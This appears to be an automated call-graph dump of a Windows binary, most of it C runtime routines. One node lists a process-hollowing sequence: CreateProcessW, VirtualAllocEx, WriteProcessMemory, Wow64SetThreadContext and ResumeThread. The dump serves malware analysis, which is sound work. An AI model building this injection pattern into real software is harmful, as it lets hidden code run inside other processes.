10444 377d69 __strnicoll 48 API calls 10443->10444 10444->10446 10446->10417 10467 375918 InitializeSListHead 10446->10467 10451 3774a5 10453 37753c 48 API calls 10451->10453 10452 377499 10454 37b757 __strnicoll 14 API calls 10452->10454 10456 3774bb 10453->10456 10455 37749e 10454->10455 10458 37b0cb __freea 14 API calls 10455->10458 10456->10455 10457 3774df 10456->10457 10538 37c24a 10457->10538 10458->10446 10461 3774f6 10463 37b0cb __freea 14 API calls 10461->10463 10462 377500 10464 37b0cb __freea 14 API calls 10462->10464 10465 3774fe 10463->10465 10464->10465 10466 37b0cb __freea 14 API calls 10465->10466 10466->10446 10467->10413 10765 3776b0 10468->10765 10470 375944 10471 37594b 10470->10471 10472 375444 4 API calls 10470->10472 10471->10415 10473 375953 10472->10473 10475 37a00a _unexpected 48 API calls 10474->10475 10476 3772af 10475->10476 10477 3772e7 10476->10477 10478 37b757 __strnicoll 14 API calls 10476->10478 10477->10417 10479 3772dc 10478->10479 10480 377d69 __strnicoll 48 API calls 10479->10480 10480->10477 10482 374f95 10481->10482 10483 374f8e 10481->10483 10490 377738 10482->10490 10487 3777a9 10483->10487 10486 374f75 10486->10409 10488 377738 51 API calls 10487->10488 10489 3777bb 10488->10489 10489->10486 10493 37799b 10490->10493 10494 3779a7 ___scrt_is_nonwritable_in_current_image 10493->10494 10501 378161 EnterCriticalSection 10494->10501 10496 3779b5 10502 3777bf 10496->10502 10498 3779c2 10512 3779ea 10498->10512 10501->10496 10503 3777da 10502->10503 10511 37784d _unexpected 10502->10511 10504 37782d 10503->10504 10505 37d0c4 51 API calls 10503->10505 10503->10511 10506 37d0c4 51 API calls 10504->10506 10504->10511 10507 377823 10505->10507 10508 377843 10506->10508 10509 37b0cb __freea 14 API calls 10507->10509 10510 37b0cb __freea 14 API calls 10508->10510 10509->10504 10510->10511 10511->10498 10515 378178 LeaveCriticalSection 10512->10515 10514 377769 10514->10486 10515->10514 10517 37caa7 GetLastError 10516->10517 10518 37cab8 10516->10518 10520 37b77d __dosmaperr 14 API calls 10517->10520 10519 37c274 48 API calls 10518->10519 10521 37cae9 10519->10521 10523 37cab3 10520->10523 10564 37cb54 10521->10564 10524 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10523->10524 10525 377450 10524->10525 10526 37753c 10525->10526 10528 377562 10526->10528 10530 3775c0 10528->10530 10592 37cc16 10528->10592 10529 377483 10532 3773b0 10529->10532 10530->10529 10531 37cc16 48 API calls 10530->10531 10531->10530 10533 3773c1 10532->10533 10537 3773f3 10532->10537 10534 37b807 _unexpected 14 API calls 10533->10534 10533->10537 10535 3773ea 10534->10535 10536 37b0cb __freea 14 API calls 10535->10536 10536->10537 10537->10451 10537->10452 10539 37c365 10538->10539 10540 37c375 10539->10540 10550 37c38b _strpbrk 10539->10550 10541 37b757 __strnicoll 14 API calls 10540->10541 10542 37c37a 10541->10542 10543 377d69 __strnicoll 48 API calls 10542->10543 10557 3774ee 10543->10557 10544 37c3f6 10544->10544 10545 3773b0 14 API calls 10544->10545 10547 37c439 10545->10547 10549 37c442 10547->10549 10558 37c458 10547->10558 10551 37b0cb __freea 14 API calls 10549->10551 10550->10544 10552 37c40a 10550->10552 10598 37c72a 10550->10598 10650 37c7db 10550->10650 10551->10552 10686 37c67e 10552->10686 10553 37c4b8 10555 37b0cb __freea 14 API calls 10553->10555 10556 37c4c5 10555->10556 10559 37c67e 14 API calls 10556->10559 10557->10461 10557->10462 10558->10553 10558->10558 10561 37c4d5 10558->10561 10692 37f42e 10558->10692 10559->10557 10562 377d96 __strnicoll 11 API calls 10561->10562 10563 37c4e1 10562->10563 10565 37cb70 10564->10565 10581 37cb61 10564->10581 10566 37cb9d 10565->10566 10567 37cb78 10565->10567 10568 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 10566->10568 10567->10581 10585 37cb19 10567->10585 10570 37cbad 10568->10570 10571 37cbb4 GetLastError 10570->10571 10572 37cbca 10570->10572 10573 37b77d __dosmaperr 14 API calls 10571->10573 10574 37cbdb 10572->10574 10577 37cb19 14 API calls 10572->10577 10576 37cbc0 10573->10576 10574->10581 10589 37c594 10574->10589 10579 37b757 __strnicoll 14 API calls 10576->10579 10577->10574 10579->10581 10580 37cbf5 GetLastError 10582 37b77d __dosmaperr 14 API calls 10580->10582 10581->10523 10583 37cc01 10582->10583 10584 37b757 __strnicoll 14 API calls 10583->10584 10584->10581 10586 37cb24 10585->10586 10587 37b757 __strnicoll 14 API calls 10586->10587 10588 37cb2d 10587->10588 10588->10581 10590 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 10589->10590 10591 37c5b1 10590->10591 10591->10580 10591->10581 10595 37cc2e 10592->10595 10596 37a8c8 __strnicoll 48 API calls 10595->10596 10597 37cc29 10596->10597 10597->10528 10599 37c736 10598->10599 10599->10599 10600 37b807 _unexpected 14 API calls 10599->10600 10618 37c74f 10599->10618 10601 37c764 10600->10601 10602 37f42e 48 API calls 10601->10602 10604 37c777 10601->10604 10602->10604 10603 37f42e 48 API calls 10605 37c790 10603->10605 10604->10603 10606 37c7ce 10604->10606 10605->10606 10607 37c797 10605->10607 10609 377d96 __strnicoll 11 API calls 10606->10609 10701 37c6a3 10607->10701 10616 37c7da 10609->10616 10611 37c7b0 10615 37b0cb __freea 14 API calls 10611->10615 10612 37b0cb __freea 14 API calls 10612->10611 10613 37c822 10614 37c84e 10613->10614 10617 37c83b 10613->10617 10621 37c274 48 API calls 10614->10621 10615->10618 10616->10613 10712 37f530 10616->10712 10619 37c72a 56 API calls 10617->10619 10618->10550 10649 37c846 10619->10649 10622 37c8a2 10621->10622 10623 37c30c 17 API calls 10622->10623 10625 37c8b0 FindFirstFileExW 10623->10625 10624 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10626 37ca5e 10624->10626 10627 37c8d8 10625->10627 10635 37c906 10625->10635 10626->10550 10628 37c72a 56 API calls 10627->10628 10630 37c8e6 10628->10630 10629 37c274 48 API calls 10629->10635 10632 37b0cb __freea 14 API calls 10630->10632 10630->10649 10632->10649 10633 37c72a 56 API calls 10633->10635 10634 37c9b7 FindNextFileW 10634->10635 10637 37c9cd 10634->10637 10635->10629 10635->10633 10635->10634 10636 37b0cb __freea 14 API calls 10635->10636 10638 37ca1c 10635->10638 10715 37c5b8 10635->10715 10636->10635 10639 37c9fd FindClose 10637->10639 10738 37ef40 10637->10738 10640 37ca30 FindClose 10638->10640 10644 37b0cb __freea 14 API calls 10638->10644 10643 37ca0c 10639->10643 10639->10649 10641 37ca3f 10640->10641 10640->10649 10645 37b0cb __freea 14 API calls 10641->10645 10647 37b0cb __freea 14 API calls 10643->10647 10648 37ca2f 10644->10648 10645->10649 10647->10649 10648->10640 10649->10624 10651 37c822 10650->10651 10658 37c805 10650->10658 10652 37c84e 10651->10652 10653 37c83b 10651->10653 10656 37c274 48 API calls 10652->10656 10654 37c72a 60 API calls 10653->10654 10685 37c846 10654->10685 10655 37f530 48 API calls 10655->10658 10657 37c8a2 10656->10657 10659 37c30c 17 API calls 10657->10659 10658->10651 10658->10655 10661 37c8b0 FindFirstFileExW 10659->10661 10660 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10662 37ca5e 10660->10662 10663 37c8d8 10661->10663 10671 37c906 10661->10671 10662->10550 10664 37c72a 60 API calls 10663->10664 10666 37c8e6 10664->10666 10665 37c274 48 API calls 10665->10671 10668 37b0cb __freea 14 API calls 10666->10668 10666->10685 10667 37c5b8 18 API calls 10667->10671 10668->10685 10669 37c72a 60 API calls 10669->10671 10670 37c9b7 FindNextFileW 10670->10671 10673 37c9cd 10670->10673 10671->10665 10671->10667 10671->10669 10671->10670 10672 37b0cb __freea 14 API calls 10671->10672 10674 37ca1c 10671->10674 10672->10671 10675 37c9fd FindClose 10673->10675 10678 37ef40 48 API calls 10673->10678 10676 37ca30 FindClose 10674->10676 10680 37b0cb __freea 14 API calls 10674->10680 10679 37ca0c 10675->10679 10675->10685 10677 37ca3f 10676->10677 10676->10685 10681 37b0cb __freea 14 API calls 10677->10681 10682 37c9fa 10678->10682 10683 37b0cb __freea 14 API calls 10679->10683 10684 37ca2f 10680->10684 10681->10685 10682->10675 10683->10685 10684->10676 10685->10660 10691 37c688 10686->10691 10687 37c698 10688 37b0cb __freea 14 API calls 10687->10688 10690 37c69f 10688->10690 10689 37b0cb __freea 14 API calls 10689->10691 10690->10557 10691->10687 10691->10689 10696 37f439 10692->10696 10693 37f453 10694 37f467 10693->10694 10695 37b757 __strnicoll 14 API calls 10693->10695 10694->10558 10697 37f45d 10695->10697 10696->10693 10696->10694 10699 37f48c 10696->10699 10698 377d69 __strnicoll 48 API calls 10697->10698 10698->10694 10699->10694 10700 37b757 __strnicoll 14 API calls 10699->10700 10700->10697 10702 37c6b5 10701->10702 10710 37c6b1 10701->10710 10703 37c6e0 10702->10703 10704 37c6ba 10702->10704 10706 37d0c4 51 API calls 10703->10706 10703->10710 10705 37b807 _unexpected 14 API calls 10704->10705 10707 37c6c3 10705->10707 10708 37c700 10706->10708 10709 37b0cb __freea 14 API calls 10707->10709 10711 37b0cb __freea 14 API calls 10708->10711 10709->10710 10710->10611 10710->10612 10711->10710 10746 37f547 10712->10746 10714 37f542 10714->10616 10716 37c5c6 10715->10716 10717 37c5e2 10715->10717 10718 37c2f2 14 API calls 10716->10718 10719 37c605 10717->10719 10720 37c5e9 10717->10720 10721 37c5d0 10718->10721 10722 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 10719->10722 10720->10721 10760 37c329 10720->10760 10721->10635 10724 37c615 10722->10724 10725 37c632 10724->10725 10726 37c61c GetLastError 10724->10726 10728 37c643 10725->10728 10730 37c329 15 API calls 10725->10730 10727 37b77d __dosmaperr 14 API calls 10726->10727 10729 37c628 10727->10729 10728->10721 10731 37c594 WideCharToMultiByte 10728->10731 10732 37b757 __strnicoll 14 API calls 10729->10732 10730->10728 10733 37c659 10731->10733 10732->10721 10733->10721 10734 37c65d GetLastError 10733->10734 10735 37b77d __dosmaperr 14 API calls 10734->10735 10736 37c669 10735->10736 10737 37b757 __strnicoll 14 API calls 10736->10737 10737->10721 10739 37ef7a 10738->10739 10740 37b757 __strnicoll 14 API calls 10739->10740 10745 37ef8e 10739->10745 10741 37ef83 10740->10741 10742 377d69 __strnicoll 48 API calls 10741->10742 10742->10745 10743 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10744 37c9fa 10743->10744 10744->10639 10745->10743 10747 37f555 10746->10747 10748 37f569 10746->10748 10751 37b757 __strnicoll 14 API calls 10747->10751 10749 37f583 10748->10749 10750 37f571 10748->10750 10756 37a8c8 __strnicoll 48 API calls 10749->10756 10759 37f581 10749->10759 10752 37b757 __strnicoll 14 API calls 10750->10752 10753 37f55a 10751->10753 10755 37f576 10752->10755 10754 377d69 __strnicoll 48 API calls 10753->10754 10757 37f565 10754->10757 10758 377d69 __strnicoll 48 API calls 10755->10758 10756->10759 10757->10714 10758->10759 10759->10714 10761 37c2f2 14 API calls 10760->10761 10762 37c337 10761->10762 10763 37c255 15 API calls 10762->10763 10764 37c345 10763->10764 10764->10721 10766 3776ce 10765->10766 10770 3776ee 10765->10770 10767 37b757 __strnicoll 14 API calls 10766->10767 10768 3776e4 10767->10768 10769 377d69 __strnicoll 48 API calls 10768->10769 10769->10770 10770->10470 8608 38b18d 8615 38b1c3 8608->8615 8609 38b310 GetPEB 8610 38b322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 8609->8610 8611 38b3c9 WriteProcessMemory 8610->8611 8610->8615 8612 38b40e 8611->8612 8613 38b450 WriteProcessMemory Wow64SetThreadContext ResumeThread 8612->8613 8614 38b413 WriteProcessMemory 8612->8614 8614->8612 8615->8609 8615->8610 10315 36be70 10316 36be9b 10315->10316 10317 376ed5 21 API calls 10316->10317 10318 36beaf 10317->10318 11352 37a5f0 11353 37a5fc ___scrt_is_nonwritable_in_current_image 11352->11353 11364 378161 EnterCriticalSection 11353->11364 11355 37a603 11365 37d839 11355->11365 11358 37a621 11384 37a647 11358->11384 11363 37a732 2 API calls 11363->11358 11364->11355 11366 37d845 ___scrt_is_nonwritable_in_current_image 11365->11366 11367 37d86f 11366->11367 11368 37d84e 11366->11368 11387 378161 EnterCriticalSection 11367->11387 11369 37b757 __strnicoll 14 API calls 11368->11369 11371 37d853 11369->11371 11372 377d69 __strnicoll 48 API calls 11371->11372 11373 37a612 11372->11373 11373->11358 11378 37a67c GetStartupInfoW 11373->11378 11374 37d8a7 11395 37d8ce 11374->11395 11376 37d87b 11376->11374 11388 37d789 11376->11388 11379 37a61c 11378->11379 11380 37a699 11378->11380 11379->11363 11380->11379 11381 37d839 49 API calls 11380->11381 11382 37a6c1 11381->11382 11382->11379 11383 37a6f1 GetFileType 11382->11383 11383->11382 11399 378178 LeaveCriticalSection 11384->11399 11386 37a632 11387->11376 11389 37b807 _unexpected 14 API calls 11388->11389 11390 37d79b 11389->11390 11392 379c11 6 API calls 11390->11392 11394 37d7a8 11390->11394 11391 37b0cb __freea 14 API calls 11393 37d7fd 11391->11393 11392->11390 11393->11376 11394->11391 11398 378178 LeaveCriticalSection 11395->11398 11397 37d8d5 11397->11373 11398->11397 11399->11386 11409 376bf0 11410 37b4a7 ___scrt_uninitialize_crt 77 API calls 11409->11410 11411 376bf8 11410->11411 11419 37b864 11411->11419 11413 376bfd 11429 37b90f 11413->11429 11416 376c27 11417 37b0cb __freea 14 API calls 11416->11417 11418 376c32 11417->11418 11420 37b870 ___scrt_is_nonwritable_in_current_image 11419->11420 11433 378161 EnterCriticalSection 11420->11433 11422 37b87b 11423 37b8e7 11422->11423 11426 37b8bb DeleteCriticalSection 11422->11426 11434 37ed63 11422->11434 11440 37b906 11423->11440 11427 37b0cb __freea 14 API calls 11426->11427 11427->11422 11430 37b926 11429->11430 11431 376c0c DeleteCriticalSection 11429->11431 11430->11431 11432 37b0cb __freea 14 API calls 11430->11432 11431->11413 11431->11416 11432->11431 11433->11422 11435 37ed76 __strnicoll 11434->11435 11443 37ee21 11435->11443 11437 37ed82 11438 377fd7 __strnicoll 48 API calls 11437->11438 11439 37ed8e 11438->11439 11439->11422 11515 378178 LeaveCriticalSection 11440->11515 11442 37b8f3 11442->11413 11444 37ee2d ___scrt_is_nonwritable_in_current_image 11443->11444 11445 37ee37 11444->11445 11446 37ee5a 11444->11446 11447 377f12 __strnicoll 29 API calls 11445->11447 11453 37ee52 11446->11453 11454 376aef EnterCriticalSection 11446->11454 11447->11453 11449 37ee78 11455 37ed93 11449->11455 11451 37ee85 11469 37eeb0 11451->11469 11453->11437 11454->11449 11456 37edc3 11455->11456 11457 37eda0 11455->11457 11459 37b515 ___scrt_uninitialize_crt 73 API calls 11456->11459 11467 37edbb 11456->11467 11458 377f12 __strnicoll 29 API calls 11457->11458 11458->11467 11460 37eddb 11459->11460 11461 37b90f 14 API calls 11460->11461 11462 37ede3 11461->11462 11463 37d936 ___scrt_uninitialize_crt 48 API calls 11462->11463 11464 37edef 11463->11464 11472 38001b 11464->11472 11467->11451 11468 37b0cb __freea 14 API calls 11468->11467 11514 376b03 LeaveCriticalSection 11469->11514 11471 37eeb6 11471->11453 11475 37edf6 11472->11475 11476 380044 11472->11476 11473 380093 11474 377f12 __strnicoll 29 API calls 11473->11474 11474->11475 11475->11467 11475->11468 11476->11473 11477 38006b 11476->11477 11479 3800be 11477->11479 11480 3800ca ___scrt_is_nonwritable_in_current_image 11479->11480 11487 37d8d7 EnterCriticalSection 11480->11487 11482 3800d8 11483 380109 11482->11483 11488 37ff7b 11482->11488 11501 380143 11483->11501 11487->11482 11489 37d68e ___scrt_uninitialize_crt 48 API calls 11488->11489 11492 37ff8b 11489->11492 11490 37ff91 11504 37d6f8 11490->11504 11492->11490 11493 37d68e ___scrt_uninitialize_crt 48 API calls 11492->11493 11500 37ffc3 11492->11500 11495 37ffba 11493->11495 11494 37d68e ___scrt_uninitialize_crt 48 API calls 11496 37ffcf CloseHandle 11494->11496 11497 37d68e ___scrt_uninitialize_crt 48 API calls 11495->11497 11496->11490 11498 37ffdb GetLastError 11496->11498 11497->11500 11498->11490 11499 37ffe9 ___scrt_uninitialize_crt 11499->11483 11500->11490 11500->11494 11513 37d8fa LeaveCriticalSection 11501->11513 11503 38012c 11503->11475 11505 37d707 11504->11505 11506 37d76e 11504->11506 11505->11506 11512 37d731 11505->11512 11507 37b757 __strnicoll 14 API calls 11506->11507 11508 37d773 11507->11508 11509 37b76a __dosmaperr 14 API calls 11508->11509 11510 37d75e 11509->11510 11510->11499 11511 37d758 SetStdHandle 11511->11510 11512->11510 11512->11511 11513->11503 11514->11471 11515->11442 8616 3756e2 8617 3756ee ___scrt_is_nonwritable_in_current_image 8616->8617 8642 37508f 8617->8642 8619 3756f5 8620 37584e 8619->8620 8629 37571f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 8619->8629 8683 375444 IsProcessorFeaturePresent 8620->8683 8622 375855 8623 37585b 8622->8623 8687 376ed5 8622->8687 8690 376eeb 8623->8690 8627 37573e 8628 3757bf 8653 377a56 8628->8653 8629->8627 8629->8628 8666 376f1f 8629->8666 8632 3757c5 8657 36cd90 8632->8657 8637 3757ea 8638 3757f3 8637->8638 8674 376f01 8637->8674 8677 3750c8 8638->8677 8643 375098 8642->8643 8693 375200 IsProcessorFeaturePresent 8643->8693 8647 3750a9 8652 3750ad 8647->8652 8703 376a60 8647->8703 8650 3750c4 8650->8619 8652->8619 8654 377a5f 8653->8654 8655 377a64 8653->8655 8775 377b7f 8654->8775 8655->8632 9710 36ce30 8657->9710 8664 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8665 36ce24 8664->8665 8672 3753ec GetModuleHandleW 8665->8672 8667 376f35 ___scrt_is_nonwritable_in_current_image _unexpected 8666->8667 8667->8628 8668 37a00a _unexpected 48 API calls 8667->8668 8671 37847c 8668->8671 8669 37835d CallUnexpected 48 API calls 8670 3784a6 8669->8670 8671->8669 8673 3753f8 8672->8673 8673->8622 8673->8637 10097 377020 8674->10097 8678 3750d4 8677->8678 8679 3750ea 8678->8679 10170 376a72 8678->10170 8679->8627 8681 3750e2 8682 3760ca ___scrt_uninitialize_crt 7 API calls 8681->8682 8682->8679 8684 37545a CallUnexpected std::bad_exception::bad_exception 8683->8684 8685 375505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8684->8685 8686 375550 CallUnexpected 8685->8686 8686->8622 8688 377020 CallUnexpected 21 API calls 8687->8688 8689 376ee6 8688->8689 8689->8623 8691 377020 CallUnexpected 21 API calls 8690->8691 8692 375863 8691->8692 8694 3750a4 8693->8694 8695 3760ab 8694->8695 8712 379706 8695->8712 8699 3760c7 8699->8647 8700 3760bc 8700->8699 8726 379742 8700->8726 8702 3760b4 8702->8647 8766 37b105 8703->8766 8706 3760ca 8707 3760d3 8706->8707 8708 3760dd 8706->8708 8709 378811 ___vcrt_uninitialize_ptd 6 API calls 8707->8709 8708->8652 8710 3760d8 8709->8710 8711 379742 ___vcrt_uninitialize_locks DeleteCriticalSection 8710->8711 8711->8708 8713 37970f 8712->8713 8715 379738 8713->8715 8716 3760b0 8713->8716 8730 37dc17 8713->8730 8717 379742 ___vcrt_uninitialize_locks DeleteCriticalSection 8715->8717 8716->8702 8718 3787de 8716->8718 8717->8716 8747 37db28 8718->8747 8721 3787f3 8721->8700 8724 37880e 8724->8700 8727 37976c 8726->8727 8728 37974d 8726->8728 8727->8702 8729 379757 DeleteCriticalSection 8728->8729 8729->8727 8729->8729 8735 37dca9 8730->8735 8733 37dc4f InitializeCriticalSectionAndSpinCount 8734 37dc3a 8733->8734 8734->8713 8736 37dc31 8735->8736 8739 37dcca 8735->8739 8736->8733 8736->8734 8737 37dd32 GetProcAddress 8737->8736 8739->8736 8739->8737 8740 37dd23 8739->8740 8742 37dc5e LoadLibraryExW 8739->8742 8740->8737 8741 37dd2b FreeLibrary 8740->8741 8741->8737 8743 37dca5 8742->8743 8744 37dc75 GetLastError 8742->8744 8743->8739 8744->8743 8745 37dc80 ___vcrt_FlsFree 8744->8745 8745->8743 8746 37dc96 LoadLibraryExW 8745->8746 8746->8739 8748 37dca9 ___vcrt_FlsFree 5 API calls 8747->8748 8749 37db42 8748->8749 8750 37db5b TlsAlloc 8749->8750 8751 3787e8 8749->8751 8751->8721 8752 37dbd9 8751->8752 8753 37dca9 ___vcrt_FlsFree 5 API calls 8752->8753 8754 37dbf3 8753->8754 8755 37dc0e TlsSetValue 8754->8755 8756 378801 8754->8756 8755->8756 8756->8724 8757 378811 8756->8757 8758 37881b 8757->8758 8759 378821 8757->8759 8761 37db63 8758->8761 8759->8721 8762 37dca9 ___vcrt_FlsFree 5 API calls 8761->8762 8763 37db7d 8762->8763 8764 37db95 TlsFree 8763->8764 8765 37db89 8763->8765 8764->8765 8765->8759 8767 37b115 8766->8767 8768 3750b6 8766->8768 8767->8768 8770 37a732 8767->8770 8768->8650 8768->8706 8771 37a739 8770->8771 8772 37a77c GetStdHandle 8771->8772 8773 37a7de 8771->8773 8774 37a78f GetFileType 8771->8774 8772->8771 8773->8767 8774->8771 8776 377b88 8775->8776 8777 377b9e 8775->8777 8776->8777 8781 377ac0 8776->8781 8777->8655 8779 377b95 8779->8777 8798 377c8d 8779->8798 8782 377acc 8781->8782 8783 377ac9 8781->8783 8807 37a880 8782->8807 8783->8779 8788 377add 8834 37b0cb 8788->8834 8789 377ae9 8840 377bab 8789->8840 8794 37b0cb __freea 14 API calls 8795 377b0d 8794->8795 8796 37b0cb __freea 14 API calls 8795->8796 8797 377b13 8796->8797 8797->8779 8799 377cfe 8798->8799 8800 377c9c 8798->8800 8799->8777 8800->8799 8801 37b807 _unexpected 14 API calls 8800->8801 8802 377d02 8800->8802 8804 37d131 WideCharToMultiByte ___scrt_uninitialize_crt 8800->8804 8806 37b0cb __freea 14 API calls 8800->8806 9429 37d304 8800->9429 8801->8800 8803 37b0cb __freea 14 API calls 8802->8803 8803->8799 8804->8800 8806->8800 8808 37a889 8807->8808 8812 377ad2 8807->8812 8862 37a0c5 8808->8862 8813 37d22d GetEnvironmentStringsW 8812->8813 8814 37d245 8813->8814 8827 377ad7 8813->8827 8815 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 8814->8815 8816 37d262 8815->8816 8817 37d277 8816->8817 8818 37d26c FreeEnvironmentStringsW 8816->8818 8819 37bc45 __strnicoll 15 API calls 8817->8819 8818->8827 8820 37d27e 8819->8820 8821 37d297 8820->8821 8822 37d286 8820->8822 8823 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 8821->8823 8824 37b0cb __freea 14 API calls 8822->8824 8825 37d2a7 8823->8825 8826 37d28b FreeEnvironmentStringsW 8824->8826 8828 37d2b6 8825->8828 8829 37d2ae 8825->8829 8826->8827 8827->8788 8827->8789 8831 37b0cb __freea 14 API calls 8828->8831 8830 37b0cb __freea 14 API calls 8829->8830 8832 37d2b4 FreeEnvironmentStringsW 8830->8832 8831->8832 8832->8827 8835 37b0d6 RtlFreeHeap 8834->8835 8836 377ae3 8834->8836 8835->8836 8837 37b0eb GetLastError 8835->8837 8836->8779 8838 37b0f8 __dosmaperr 8837->8838 8839 37b757 __strnicoll 12 API calls 8838->8839 8839->8836 8841 377bc0 8840->8841 8842 37b807 _unexpected 14 API calls 8841->8842 8843 377be7 8842->8843 8844 377bef 8843->8844 8854 377bf9 8843->8854 8845 37b0cb __freea 14 API calls 8844->8845 8846 377af0 8845->8846 8846->8794 8847 377c56 8848 37b0cb __freea 14 API calls 8847->8848 8848->8846 8849 37b807 _unexpected 14 API calls 8849->8854 8850 377c65 9419 377b50 8850->9419 8854->8847 8854->8849 8854->8850 8856 377c80 8854->8856 8858 37b0cb __freea 14 API calls 8854->8858 9410 3796ac 8854->9410 8855 37b0cb __freea 14 API calls 8857 377c72 8855->8857 9425 377d96 IsProcessorFeaturePresent 8856->9425 8860 37b0cb __freea 14 API calls 8857->8860 8858->8854 8860->8846 8861 377c8c 8863 37a0d0 8862->8863 8864 37a0d6 8862->8864 8909 379b90 8863->8909 8884 37a0dc 8864->8884 8914 379bcf 8864->8914 8872 37a11d 8874 379bcf _unexpected 6 API calls 8872->8874 8873 37a108 8875 379bcf _unexpected 6 API calls 8873->8875 8876 37a129 8874->8876 8882 37a114 8875->8882 8877 37a12d 8876->8877 8878 37a13c 8876->8878 8879 379bcf _unexpected 6 API calls 8877->8879 8928 37a31c 8878->8928 8879->8882 8881 37b0cb __freea 14 API calls 8881->8884 8882->8881 8886 37a0e1 8884->8886 8933 37835d 8884->8933 8885 37b0cb __freea 14 API calls 8885->8886 8887 37acc3 8886->8887 8888 37aced 8887->8888 9234 37ab4f 8888->9234 8893 37ad1f 8895 37b0cb __freea 14 API calls 8893->8895 8894 37ad2d 9248 37a94a 8894->9248 8897 37ad06 8895->8897 8897->8812 8899 37ad65 8900 37b757 __strnicoll 14 API calls 8899->8900 8901 37ad6a 8900->8901 8903 37b0cb __freea 14 API calls 8901->8903 8902 37adac 8905 37adf5 8902->8905 9259 37b07e 8902->9259 8903->8897 8904 37ad80 8904->8902 8907 37b0cb __freea 14 API calls 8904->8907 8906 37b0cb __freea 14 API calls 8905->8906 8906->8897 8907->8902 8942 379e9e 8909->8942 8912 379bc7 TlsGetValue 8913 379bb5 8913->8864 8915 379e9e _unexpected 5 API calls 8914->8915 8916 379beb 8915->8916 8917 379bf4 8916->8917 8918 379c09 TlsSetValue 8916->8918 8917->8884 8919 37b807 8917->8919 8920 37b814 8919->8920 8921 37b854 8920->8921 8922 37b83f HeapAlloc 8920->8922 8927 37b828 _unexpected 8920->8927 8960 37b757 8921->8960 8923 37b852 8922->8923 8922->8927 8925 37a100 8923->8925 8925->8872 8925->8873 8927->8921 8927->8922 8957 377207 8927->8957 8997 37a482 8928->8997 9099 37b1bc 8933->9099 8935 378362 8935->8933 8937 378377 IsProcessorFeaturePresent 8935->8937 8938 376eeb CallUnexpected 21 API calls 8935->8938 8941 378839 8935->8941 9102 37b1e3 8935->9102 9129 377dca 8935->9129 9135 37883a 8935->9135 8937->8935 8938->8935 8943 379ece 8942->8943 8944 379bac 8942->8944 8943->8944 8949 379dd3 8943->8949 8944->8912 8944->8913 8947 379ee8 GetProcAddress 8947->8944 8948 379ef8 _unexpected 8947->8948 8948->8944 8955 379de4 ___vcrt_FlsFree 8949->8955 8950 379e02 LoadLibraryExW 8952 379e81 8950->8952 8953 379e1d GetLastError 8950->8953 8951 379e7a 8951->8944 8951->8947 8952->8951 8954 379e93 FreeLibrary 8952->8954 8953->8955 8954->8951 8955->8950 8955->8951 8956 379e50 LoadLibraryExW 8955->8956 8956->8952 8956->8955 8963 377242 8957->8963 8974 37a15b GetLastError 8960->8974 8962 37b75c 8962->8925 8964 37724e ___scrt_is_nonwritable_in_current_image 8963->8964 8969 378161 EnterCriticalSection 8964->8969 8966 377259 CallUnexpected 8970 377290 8966->8970 8969->8966 8973 378178 LeaveCriticalSection 8970->8973 8972 377212 8972->8927 8973->8972 8975 37a171 8974->8975 8976 37a177 8974->8976 8978 379b90 _unexpected 6 API calls 8975->8978 8977 379bcf _unexpected 6 API calls 8976->8977 8980 37a17b SetLastError 8976->8980 8979 37a193 8977->8979 8978->8976 8979->8980 8982 37b807 _unexpected 12 API calls 8979->8982 8980->8962 8983 37a1a8 8982->8983 8984 37a1c1 8983->8984 8985 37a1b0 8983->8985 8987 379bcf _unexpected 6 API calls 8984->8987 8986 379bcf _unexpected 6 API calls 8985->8986 8988 37a1be 8986->8988 8989 37a1cd 8987->8989 8992 37b0cb __freea 12 API calls 8988->8992 8990 37a1d1 8989->8990 8991 37a1e8 8989->8991 8994 379bcf _unexpected 6 API calls 8990->8994 8993 37a31c _unexpected 12 API calls 8991->8993 8992->8980 8995 37a1f3 8993->8995 8994->8988 8996 37b0cb __freea 12 API calls 8995->8996 8996->8980 8998 37a48e ___scrt_is_nonwritable_in_current_image 8997->8998 9011 378161 EnterCriticalSection 8998->9011 9000 37a498 9012 37a4c8 9000->9012 9003 37a4d4 9004 37a4e0 ___scrt_is_nonwritable_in_current_image 9003->9004 9016 378161 EnterCriticalSection 9004->9016 9006 37a4ea 9017 37a2d1 9006->9017 9008 37a502 9021 37a522 9008->9021 9011->9000 9015 378178 LeaveCriticalSection 9012->9015 9014 37a38a 9014->9003 9015->9014 9016->9006 9018 37a2e0 _unexpected 9017->9018 9019 37a307 _unexpected 9017->9019 9018->9019 9024 37bfae 9018->9024 9019->9008 9098 378178 LeaveCriticalSection 9021->9098 9023 37a147 9023->8885 9025 37c02e 9024->9025 9029 37bfc4 9024->9029 9026 37c07c 9025->9026 9028 37b0cb __freea 14 API calls 9025->9028 9092 37c148 9026->9092 9030 37c050 9028->9030 9029->9025 9031 37bff7 9029->9031 9035 37b0cb __freea 14 API calls 9029->9035 9032 37b0cb __freea 14 API calls 9030->9032 9039 37b0cb __freea 14 API calls 9031->9039 9051 37c019 9031->9051 9033 37c063 9032->9033 9038 37b0cb __freea 14 API calls 9033->9038 9034 37b0cb __freea 14 API calls 9040 37c023 9034->9040 9037 37bfec 9035->9037 9036 37c08a 9041 37c0ea 9036->9041 9042 37b0cb 14 API calls __freea 9036->9042 9052 37b9d5 9037->9052 9044 37c071 9038->9044 9045 37c00e 9039->9045 9046 37b0cb __freea 14 API calls 9040->9046 9047 37b0cb __freea 14 API calls 9041->9047 9042->9036 9049 37b0cb __freea 14 API calls 9044->9049 9080 37bad3 9045->9080 9046->9025 9048 37c0f0 9047->9048 9048->9019 9049->9026 9051->9034 9053 37b9e6 